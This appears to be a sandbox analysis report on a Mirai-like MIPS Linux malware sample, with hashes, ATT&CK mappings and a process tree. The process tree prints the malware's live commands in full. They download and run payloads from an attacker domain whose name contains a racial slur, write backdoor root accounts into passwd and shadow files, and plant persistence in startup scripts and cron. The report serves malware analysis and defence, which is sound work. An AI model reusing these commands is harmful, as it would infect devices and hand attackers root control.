162fc20137869b464c21e74b1d7688bff11b44bbe430565ccb8079ddf5191b7e

Analysis

max time kernel
124s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20221111-en
resource tags

arch:mipselimage:debian9-mipsel-20221111-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
11/07/2023, 10:17

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471.elf
Size

116KB
MD5

6b83021aff7f7346a9ee2de629217b84
SHA1

3c4eb69c00383c685d39ac0cd8586dda24b90b69
SHA256

cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471
SHA512

b9b055266304db9f4b6a62b94d80707b7f8d4574bb54a95a2d99d6322d2af260177c1e8f77f9443f84192352acd5bb7c3345738a3571afef2e27cb3ce6d81862
SSDEEP

3072:+vdX7QeSHi3yzdDfRdvv7iS3B5OR4jId4:g2eSHi3YDfRV7iS3B5ORCId4

Score

9^/10

discovery persistence

Malware Config

Signatures

Contacts a large (107936) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046

Modifies password files for system users/ groups 3 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

description	ioc	Process
File opened for modification	/etc/passwd	sh
File opened for modification	/etc/shadow	sh
File opened for modification	/etc/passwd	sh

Deletes itself 1 IoCs

pid	Process
328	cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471.elf

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

Impair Defenses

T1562

description	ioc
File opened for modification	/dev/watchdog
File opened for modification	/dev/misc/watchdog

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task

T1053

description	ioc	Process
File opened for modification	/etc/cron.hourly/0	sh

Creates/modifies environment variables 1 TTPs 1 IoCs

Creating/modifying environment variables is a common persistence mechanism.

persistence

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/etc/profile	sh

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery

T1049

description	ioc
File opened for reading	/proc/net/tcp

Modifies init.d 1 TTPs 2 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/init.d/rcD	sh
File opened for modification	/etc/init.d/procps	sh

Modifies rc script 1 TTPs 2 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/rc.d/rc.local	sh
File opened for modification	/etc/rc.local	sh

Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/bin/watchdog

Modifies Bash startup script 1 TTPs 1 IoCs

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/profile	sh

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

description	ioc
File opened for reading	/proc/net/tcp

Reads runtime system information 9 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/413/exe	Process not Found
File opened for reading	/proc/414/exe	Process not Found
File opened for reading	/proc/415/exe	Process not Found
File opened for reading	/proc/418/exe	Process not Found
File opened for reading	/proc/422/exe	Process not Found
File opened for reading	/proc/426/exe	Process not Found
File opened for reading	/proc/self/loginuid	su
File opened for reading	/proc/self/loginuid	su
File opened for reading	/proc/336/exe	Process not Found

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471.elf	cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471.elf

/tmp/cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471.elf
/tmp/cfe2c47fb519b7d3383c8a0ac857b399960f04dfdc61a68a86592cb2ede5b471.elf
1⤵
- Deletes itself
- Writes file to tmp directory
PID:328

/bin/sh
sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647\" >> .profile"
1⤵
PID:345

/bin/sh
sh -c "echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd"
1⤵
- Modifies password files for system users/ groups
PID:346

/bin/sh
sh -c "cfgmtd -w -p /etc/ && save"
1⤵
PID:349

/bin/sh
sh -c "echo \"echo \\\"ubnt:\\\\\\\$1\\\\\\\$PN1nGGW/\\\\\\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\\\" > /var/etc/passwd && (sleep 120 && /bin/wget http://fucking.blackpeople.lol/mips -O /var/etc/persistent/pr0 && chmod 777 /var/etc/persistent/pr0 && /var/etc/persistent/pr0) &\" > /var/etc/persistent/rc.poststart && echo \"ubnt:\\\$1\\\$PN1nGGW/\\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\" > /var/etc/passwd"
1⤵
PID:350

/bin/sh
sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647\" >> /etc/profile"
1⤵
- Creates/modifies environment variables
- Modifies Bash startup script
PID:351

/bin/sh
sh -c "echo -e \"#!/bin/sh\\n\\nuseradd -u 0 -g 0 -o -d / ubnt -p '\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0/' >/dev/null 2>&1\" > /etc/cron.hourly/0"
1⤵
- Creates/modifies Cron job
PID:352

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.d/rc.local && chmod +x /etc/rc.d/rc.local"
1⤵
- Modifies rc script
PID:359

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.d/clith.sh && chmod +x /etc/rc.d/clith.sh"
1⤵
PID:360

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.local && chmod +x /etc/rc.local"
1⤵
- Modifies rc script
PID:361
- /bin/chmod
  chmod +x /etc/rc.local
  2⤵
  PID:405

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /rc.d/rc.local && chmod +x /rc.d/rc.local"
1⤵
PID:362

/bin/sh
sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /etc/init.d/procps && chmod +x /etc/init.d/procps"
1⤵
- Modifies init.d
PID:368
- /bin/chmod
  chmod +x /etc/init.d/procps
  2⤵
  PID:406

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/init.d/rcD && chmod +x /etc/init.d/rcD"
1⤵
- Modifies init.d
PID:369
- /bin/chmod
  chmod +x /etc/init.d/rcD
  2⤵
  PID:407

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /etc_ro/rcS && chmod +x /etc_ro/rcS"
1⤵
PID:370

/bin/sh
sh -c "echo -e \"(sleep 10 cd /data/local/tmp; && busybox wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; sh bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /system/etc/init.d/arenahi && chmod +x /system/etc/init.d/arenahi "
1⤵
PID:371

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc_ro/rcD && chmod +x /etc_ro/rcD"
1⤵
PID:372

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /usr/etc/profile"
1⤵
PID:375

/bin/sh
sh -c "echo -e \"admin:\\\$1\\\$I4PkyslC\\\$QfxbtwG2TLLBngD2HqOzu0:19391:0:99999:7:0:0:\" > /etc/shadow"
1⤵
- Modifies password files for system users/ groups
PID:376

/bin/sh
sh -c "echo \"rm -rf /data/local/tmp\" | su"
1⤵
PID:379
- /bin/su
  su
  2⤵
  - Reads runtime system information
  PID:388

/bin/sh
sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /rc.d/cliet.sh && chmod +x /rc.d/cliet.sh "
1⤵
PID:380

/bin/sh
sh -c "iptables -A INPUT -p tcp --destination-port 23 -j DROP"
1⤵
PID:381
- /sbin/iptables
  iptables -A INPUT -p tcp --destination-port 23 -j DROP
  2⤵
  PID:389

/bin/sh
sh -c "echo -e \"admin:\\\$1\\\$\\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd"
1⤵
- Modifies password files for system users/ groups
PID:382

/bin/sh
sh -c "echo \"rm -rf /data/local/tmp\" | su"
1⤵
PID:384
- /bin/su
  su
  2⤵
  - Reads runtime system information
  PID:399

/bin/sh
sh -c save
1⤵
PID:386

/bin/sh
sh -c save
1⤵
PID:387

/bin/sh
sh -c save
1⤵
PID:390

/bin/sh
sh -c save
1⤵
PID:391

/bin/sh
sh -c save
1⤵
PID:392

/bin/sh
sh -c save
1⤵
PID:393

/bin/sh
sh -c save
1⤵
PID:395

/bin/sh
sh -c save
1⤵
PID:396

/bin/sh
sh -c save
1⤵
PID:397

/bin/sh
sh -c save
1⤵
PID:398

/bin/sh
sh -c save
1⤵
PID:400

/bin/sh
sh -c save
1⤵
PID:401

/bin/sh
sh -c save
1⤵
PID:402

/bin/sh
sh -c save
1⤵
PID:403

/bin/sh
sh -c save
1⤵
PID:404

/bin/sh
sh -c save
1⤵
PID:408

/bin/sh
sh -c save
1⤵
PID:409

/bin/sh
sh -c save
1⤵
PID:410

/bin/sh
sh -c save
1⤵
PID:411

/bin/sh
sh -c save
1⤵
PID:413

/bin/sh
sh -c save
1⤵
PID:417

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task

T1053

Defense Evasion

Hijack Execution Flow

T1574

Impair Defenses

T1562

Credential Access

Discovery

Network Service Scanning

T1046

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.profile

Filesize
215B

MD5
1ea2d0a694bdad865e72c3ebd4a0b114

SHA1
e5c480decc5f070ec082855e00e15603bce8d352

SHA256
88a9d17c65d150ad39beb05eaea5e96aabef64107a572518b156274d45e2d520

SHA512
f32f994f6e32bb48fae09d023beacbe1a77dbbf7cb1a13059dcce3c7f26e759f19fb8d287ab0b57c46eecff0bd842edd2455ee3d249e269aa07fcf00555a796c

Download Submit
/etc/cron.hourly/0

Filesize
94B

MD5
5509679cda74805420000a7b3ee3f600

SHA1
755be69d4b2776de076f03f89c3904f49e874445

SHA256
07fc70fd59acf8eba333a9533751200c1b53655d67f02202d8b5302f4d18f7aa

SHA512
a029f53d77574da99beaf0239604a564863e9f5e8987b42a1c103da3bc9de135b8fc1b42e9478ae832375f35be45b20ebd1aef94f01c955ad2d626b32a473f41

Download Submit
/etc/init.d/rcD

Filesize
334B

MD5
e36ed4827f4df4f815396a15326836a3

SHA1
37fae0c25c9525e4b2d6837df0a4266113207cb0

SHA256
58a93b8047b612c31a3624a0f1bbd5e69cd404070ac03813335d82fd6608b586

SHA512
826b79225576dbec9ade1a24c55f476e752eb44fb309334d65d72109f64fae4a8f90131ba558a73e20bb7ca6dd28b6d1a0a41bb742b804cc01638f820cba4162

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads